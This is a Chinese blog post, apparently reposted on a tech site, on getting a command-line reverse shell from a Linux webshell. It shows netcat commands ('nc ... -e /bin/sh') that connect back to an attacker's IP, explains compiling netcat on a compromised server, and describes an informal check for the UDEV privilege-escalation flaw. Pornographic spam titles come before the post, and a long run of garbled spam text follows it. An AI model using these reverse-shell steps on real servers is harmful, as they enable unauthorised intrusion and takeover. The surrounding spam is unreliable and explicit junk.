精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

Linux下通過WebShell反彈CmdLine Shell小技巧

安全 網站安全
(昨天又不小心搜到篇自己以前寫的文章,轉了很多地方,沒見一個寫版權的)昨晚(應該是今天凌晨)玩了半天朋友給的Linux的WebShell,本來想實踐一下UDEV提權呢,最后發現服務器貌似已經打過補丁了。不過還是有其他的收獲的,所以我就YY下Linux反彈shell的問題。
(昨天又不小心搜到篇自己以前寫的文章,轉了很多地方,沒見一個寫版權的)

昨晚(應該是今天凌晨)玩了半天朋友給的Linux的WebShell,本來想實踐一下UDEV提權呢,最后發現服務器貌似已經打過補丁了。
不過還是有其他的收獲的,所以我就YY下Linux反彈shell的問題。

Linux提權絕大部分都靠的是Local Exploit。WebShell一般都可以執行命令,但是我們的EXP必須在可交互環境運行,否則如果直接在WebShell執行,即使能提權成功,我們也沒法利用到。所以我們需要先反彈一個CmdLine Shell回來(直接說成CmdShell怕人誤解...因為Win有個cmd.exe ^_^),然后在命令行終端下執行EXP進行提權。

一般情況下,絕大多數人都會通過PHP WebShell的Back Connect功能彈回一個Shell,但是有時候會碰到服務器不支持PHP或者WebShell沒法反彈的情況,比如這兩天朋友給我的一個JSPShell所在服務器只支持JSP,不支持PHP。這時候,我們經典的netcat就可以派上用場了。

平時在Windows下做事的時候,在必要的情況下我們可以先在本機運行nc -vv -lp 1234監聽端口,然后在肉雞上nc 12.21.12.21 1234 -e cmd.exe給我們反彈一個CmdShell,這個方法在Linux仍然可行。

在本機監聽后,在WebShell運行nc 12.21.12.21 1234 -e /bin/sh就能彈一個CmdLine Shell給我們。
但我們經常碰到的情況并不都是這么100%順利的,像昨晚整的那兩臺,每臺都是不能直接執行nc的。一臺有nc,但執行從是不起作用,另外一臺直接壓根就沒有nc....

不過,這個難不倒我們,我們可以給他裝一個嘛,比較快捷的方法是,我們可以到http://netcat.sourceforge.net/download.php下載nc的源碼,先在我們自己linux機器上編譯好以后把bin文件傳上去(我開始傳的我的Debian自帶的netcat,結果仍然不能運行....)。如果還不行,那就把源碼傳上去,在目標機器上直接編譯。

昨晚那兩臺機器,一臺我是直接傳的本地編譯后的,一臺是在目標機器上編譯的。如果直接傳的nc可以運行的話還比較好說,如果需要在目標機器上編譯的話,這里有點小技巧:
因為在得到CmdLine Shell前,我們只能在WebShell里執行命令,一般每次只能執行一條,然后等回顯。假如我們的WebShell在/var/www/site目錄,那么我們每次執行命令默認的當前路徑都是/var/www/site,而我們的netcat源碼包解壓在了/tmp/netcatsrc文件夾,這樣的話,我們編譯netcat的時候,configure還好說,可用/tmp/netcatsrc/configure命令,但下一步make的時候就不行了,因為當前路徑是/var/www/site,而不是我們想要的/tmp/netcatsrc/,所以我們configure完了make的時候會報錯。

解決這個問題其實也很簡單,可以直接把兩句寫成一句就可以:cd /tmp/netcatsrc;make
用分號隔開寫,把make跟在目錄切換命令后面,這樣編譯的時候就不會報錯了。(流浪貓教的..^_^)
在還沒有得到CmdLine Shell的時候,這樣的寫法還是很有用的。

編譯成功以后,我們就可以輸入命令反彈Shell了(比如我這里nc路徑是/tmp/nc):
本地nc -vv -lp 80后
/tmp/nc 202.xx.xx.250 80 -e /bin/sh就可以給我嗎彈回來一個CmdLine Shell。

效果如下圖:


----------------

要注意反彈的Linux Shell是沒有$提示符的哦,執行一句返回一句。
還有一點就是這里反彈Shell的時候我運行的是/bin/sh,當然運行/bin/bash也可以。
不過我覺得最好還是運行/bin/sh吧,因為/bin/sh的權限比/bin/bash放的更開一些

順便說一下怎么判斷目標是否有UDEV這個漏洞。
Linux我還不知道怎么樣查看它是否打過這個補丁,所以我想了個比較簡單的辦法:

1.執行cat /proc/net/netlink,記錄下PID A
2.執行ps aux | grep udev ,記下root的PID B
3.如果A = B - 1,則存在漏洞,否則不存在
這是我自己想的,因為獲得PID的時候有這兩種方法,所以我通過他們對比來判斷,但我并不能確定我這方法是100%正確的,僅供參考。
效果如下圖:
在反彈的Shell里執行,發現得到的PID不一樣,2487 != 1230

在我自己機器上,PID一樣,1184=1185-1


責任編輯:Oo小孩兒 來源: 零魂's Blog
相關推薦

2009-08-07 10:18:13

Linux反彈CmdLine S技巧

2010-11-02 21:17:17

2018-06-18 10:33:39

Linux內網技巧

2015-03-06 15:43:39

2019-12-04 12:28:24

TOP命令Linux

2017-09-04 16:20:38

Linuxshell命令

2021-12-16 10:53:23

shell命令腳本

2020-03-18 14:20:25

shellLinux命令

2011-02-25 14:10:52

Proftpd技巧

2009-10-23 08:41:14

Linux系統操作系統Grub

2010-09-26 16:46:05

2013-12-02 09:49:59

2022-11-29 10:42:46

GoFrame技巧腳手架

2011-05-27 10:02:42

Shell

2021-06-07 23:51:16

MacGo服務

2015-03-09 10:22:23

2009-07-15 09:09:45

Vim編輯器使用Vim備份

2009-06-19 13:32:40

Java開啟OpenGL

2013-11-11 17:31:34

Ubuntu技巧

2013-11-15 14:23:28

Ubuntu技巧
點贊
收藏

51CTO技術棧公眾號

国产精品永久免费观看| 亚洲欧洲高清在线| 我的公把我弄高潮了视频| 东京干手机福利视频| heyzo一区| 国产91精品一区二区麻豆亚洲| 97国产成人精品视频| av电影在线不卡| 日韩精品中文字幕吗一区二区| 精品久久久久久久久久国产| 一本久道久久综合| 五月婷婷免费视频| 亚洲高清资源在线观看| 日韩欧美aaaaaa| 成人免费视频久久| 天堂在线中文资源| 日日夜夜精品免费视频| 欧美风情在线观看| 在线观看视频你懂得| 国产福利电影在线| 丁香天五香天堂综合| 国产91在线播放精品91| 久久精品国产亚洲av麻豆色欲| 欧美性感美女一区二区| 天天亚洲美女在线视频| 亚洲综合五月天| 免费黄网站在线观看| 国产精品456| 国产精品私拍pans大尺度在线| 日韩精品视频免费看| 亚洲精品一二三区区别| 夜夜嗨av色综合久久久综合网| 丰满人妻一区二区三区免费视频棣| 日韩中文视频| 色哟哟国产精品| 日韩欧美国产综合在线| 青青草视频在线免费直播| 国产精品系列在线观看| 国产精品视频久| 91ts人妖另类精品系列| 自拍偷拍精品| 日韩精品免费在线| 男男一级淫片免费播放| 欧美激情精品| 日韩一区二区免费在线观看| 91av视频免费观看| 欧美电影在线观看网站| 在线观看av一区二区| www黄色日本| 美女在线视频免费| 欧美日韩中国免费专区在线看| 美女黄色免费看| 美女精品导航| 亚洲a一区二区| 欧美日韩一区二区三区免费| 天天躁日日躁狠狠躁伊人| 丰满亚洲少妇av| 不卡日韩av| 好看的av在线| 亚洲一区日韩| 日韩av三级在线观看| 国产成人无码av| 久久综合婷婷| 国产精品嫩草视频| 97人妻一区二区精品视频| 在线精品国产| 大胆人体色综合| 欧美黄色一区二区三区| 亚洲网址在线| 奇米成人av国产一区二区三区| av资源免费观看| 久久综合影音| 91精品国产综合久久香蕉最新版 | 成人性生交大片免费看午夜| 国产欧美日韩在线| 亚洲欧洲一区二区在线观看| 久久亚洲天堂| 污片在线观看一区二区| 日本一区二区黄色| 国产亚洲人成a在线v网站| 91麻豆精品国产91久久久久久久久 | 久久99九九| 国产毛片在线| 亚洲人成网站色在线观看 | 婷婷成人综合| 国产亚洲视频在线| 日本一二三区在线观看| 国产综合自拍| 国产精品扒开腿做爽爽爽男男| 97精品人妻一区二区三区香蕉| 成人在线一区二区三区| 欧美日本亚洲| 亚洲羞羞网站| 中文久久乱码一区二区| 亚洲五码在线观看视频| 涩涩视频在线播放| 欧美美女激情18p| 黄色一级二级三级| 国产美女视频一区二区| 日韩国产精品亚洲а∨天堂免| 青青青视频在线播放| 合欧美一区二区三区| 欧亚精品在线观看| 国产男男gay体育生白袜| 91亚洲午夜精品久久久久久| 特级毛片在线免费观看| 伊人久久在线| 欧美大胆人体bbbb| 三年中国中文观看免费播放| 亚洲视频狠狠| 91精品久久久久久久久中文字幕| 婷婷视频在线观看| 综合婷婷亚洲小说| 国产成人精品无码播放| 99香蕉久久| 久久久av亚洲男天堂| 四虎成人在线观看| 成人国产精品免费| 国产精品一级久久久| av女优在线| 一本久久综合亚洲鲁鲁五月天 | 久久久久9999亚洲精品| 日韩视频一二三| 激情久久一区二区| 日韩毛片在线看| 日本特黄一级片| 黄页视频在线91| 91精品视频在线看| 男人av在线| 欧美日韩国产中字| 日本性生活一级片| 欧美精品综合| 97**国产露脸精品国产| 国产视频在线观看免费| 国产精品另类一区| 亚洲最大综合网| 高清一区二区| 中文综合在线观看| 久久久久久无码精品大片| 91蜜桃在线观看| 欧美日韩亚洲一| 色老板在线视频一区二区| 久久久久久久久久久91| 亚洲黄色在线观看视频| 一区二区三区四区在线免费观看 | www.国产色| av激情亚洲男人天堂| r级无码视频在线观看| 亚洲午夜精品| 欧美激情aaaa| 亚洲精品中文字幕成人片| 一区二区不卡在线视频 午夜欧美不卡在| 色婷婷激情视频| 一本一本久久a久久综合精品| 91精品久久久久久久久久另类| 日本亚洲精品| 夜夜嗨av一区二区三区| 中文字幕久久久久久久| 综合精品一区| 国产91亚洲精品一区二区三区| 毛片免费在线观看| 欧美日韩亚洲精品内裤| av网站免费在线播放| 久久国产毛片| 一本一道久久a久久综合精品| 亚洲人成777| 日韩大片在线观看视频| www.国产com| 日本一区二区免费在线观看视频| 在线观看av网页| 亚洲精品成人| 国产精品乱码一区二区三区| 九色porny丨国产首页在线| 亚洲美女久久久| 久久久久黄色片| 奇米精品一区二区三区在线观看一 | 秋霞av在线| 欧美日韩中文字幕一区二区| 日本爱爱小视频| 成人丝袜高跟foot| 日本成人在线免费视频| 一区二区三区网站 | 欧美色就是色| 亚洲综合在线做性| 在线黄色的网站| 日韩有码片在线观看| 午夜精品久久久久久久第一页按摩| 精品久久久久久国产91| 久久精品三级视频| 国产不卡视频在线播放| 亚洲爆乳无码专区| 亚洲精品一二三区区别| 欧美成人免费在线| 日韩高清一区| 国产精品狼人色视频一区| 日韩另类在线| 在线观看国产成人av片| 蜜桃在线一区二区| 成人欧美一区二区三区小说| 中国xxxx性xxxx产国| 六月婷婷色综合| 色爱区成人综合网| 成人美女视频| 欧美精品制服第一页| 免费一级在线观看| 精品99久久久久久| 亚洲特级黄色片| 精品国产老师黑色丝袜高跟鞋| 亚洲精品自拍视频在线观看| 91亚洲国产成人精品一区二三| 小明看看成人免费视频| 国产精品久久久久久久免费软件 | 欧美一区观看| av综合网址| 国产精品直播网红| 亚洲精品永久免费视频| 欧美激情一级精品国产| 日韩在线免费电影| 亚洲精品一区二区久| www.国产精品视频| 欧美乱熟臀69xxxxxx| www.欧美色| 欧美特级www| 日本a在线观看| 亚洲蜜桃精久久久久久久| 五月婷婷婷婷婷| 久久久精品综合| 久久久久久久久免费看无码 | 精品一区在线播放| 欧美日韩中出| 91精品久久久久久久久青青| 草莓视频成人appios| 国产v综合ⅴ日韩v欧美大片| 国产大片在线免费观看| 亚洲老司机av| 亚洲欧美一区二区三| 亚洲成人精品久久久| 超碰在线人人干| 欧美一区二区福利在线| 国产日韩免费视频| 日韩一区二区三区精品视频| 国产美女免费视频| 欧美一三区三区四区免费在线看| 91午夜交换视频| 欧美高清你懂得| 国产又粗又猛又黄| 欧美日本不卡视频| 91成年人视频| 91精品国产全国免费观看| 国产高清免费在线观看| 日韩午夜电影在线观看| www.色呦呦| 精品国产百合女同互慰| 韩国av免费在线观看| 亚洲国产日韩欧美在线动漫| 天天射天天操天天干| 亚洲另类xxxx| av色图一区| 欧美成人中文字幕在线| 久久国产精品黑丝| 91国内精品久久| 国产精品迅雷| 国产精品尤物福利片在线观看| 亚洲在线资源| av色综合网| 欧美日韩破处| 亚洲高清视频一区| 亚洲乱码电影| 欧美男女爱爱视频| 媚黑女一区二区| 午夜视频在线网站| 国产91丝袜在线播放| 中出视频在线观看| 欧美韩国日本不卡| 青娱乐91视频| 欧美视频第一页| 在线免费观看av片| 精品久久久久一区| 国产一区二区小视频| 欧美一级精品在线| 香蕉视频黄色片| 中文字幕在线看视频国产欧美在线看完整| 秋霞影院午夜丰满少妇在线视频| 欧美日本国产在线| 亚洲欧美韩国| 91沈先生作品| 亚洲人成亚洲精品| 青青草原国产免费| 国产欧美在线| 日本一二三四区视频| av毛片久久久久**hd| 青青操在线播放| 都市激情亚洲色图| 国产精品免费无遮挡| 日韩高清a**址| 国产福利视频在线| 国产福利精品视频| 亚洲日本va| 亚洲欧美日韩在线综合| 99国产精品| 99中文字幕在线| 久久久久国产一区二区三区四区 | 中文精品视频| 国产成人美女视频| 91老师国产黑色丝袜在线| 青春草免费视频| 伊人夜夜躁av伊人久久| 伊人中文字幕在线观看 | 国产欧美日韩精品丝袜高跟鞋| av不卡一区二区| 99亚洲精品视频| 日韩av在线播放中文字幕| 欧美久久久久久久久久久| 国产精品成人在线观看| 中文字幕在线观看视频免费| 精品久久久久久久人人人人传媒| 中文字幕在线视频区| 45www国产精品网站| 一区二区三区视频播放| 特级黄色录像片| 久久av老司机精品网站导航| 国产精品1000部啪视频| 偷偷要91色婷婷| 狠狠综合久久av一区二区| 久久国产精品影片| 欧美网站免费| 日韩久久在线| 老妇喷水一区二区三区| 三级男人添奶爽爽爽视频| 亚洲国产一区二区在线播放| 99久久精品日本一区二区免费| 色爱av美腿丝袜综合粉嫩av| 欧美free嫩15| 日本一区二区三区在线视频| 久久国产日韩| 亚洲熟妇无码av| 日韩欧美在线视频观看| 亚洲色图狠狠干| 欧美一级黄色网| 亚洲宅男一区| 国产成人久久777777| 久久综合九色综合97婷婷女人 | 日韩av一区二区三区美女毛片| 先锋影音国产一区| 人妻精品久久久久中文字幕| 欧美日韩国产丝袜另类| 视频福利在线| 茄子视频成人在线| 国产一区二区三区站长工具| 亚洲精品无码久久久久久| 久久影院电视剧免费观看| 在线观看日本视频| 亚洲天堂2020| 四虎国产精品免费久久5151| 2021狠狠干| 成人中文字幕在线| 中文字幕超碰在线| 亚洲精选在线观看| 69堂精品视频在线播放| 亚洲一卡二卡三卡四卡无卡网站在线看 | 亚洲伦理在线观看| 久久久久久美女| 精品在线观看入口| 男女啪啪网站视频| 亚洲日本中文字幕区| 亚洲黄色在线播放| 日韩av快播网址| 欧美电影一区| 久久久久久久久久影视| 黑人巨大精品欧美一区二区一视频 | 精品欧美在线观看| 性视频1819p久久| 欧美久久综合网| 伦伦影院午夜理论片| 精品国产户外野外| 日本三级视频在线播放| 成人午夜电影在线播放| 久久国产免费| 免费在线观看一级片| 日韩电影视频免费| 国产91欧美| 日韩国产欧美亚洲| 国产精品久久久久永久免费观看| 99国产在线播放| 日本不卡免费高清视频| 综合久久99| 亚洲精品色午夜无码专区日韩| 91精品国产综合久久久久| 九色porny视频在线观看| 一本久道久久综合狠狠爱亚洲精品| 成人晚上爱看视频| 一区二区视频在线免费观看| 欧美精品18videos性欧| 精品一区二区三区在线| 美女流白浆视频| 欧美午夜不卡在线观看免费| caoporn视频在线| 性欧美18一19内谢| 2020国产精品自拍| 国产按摩一区二区三区|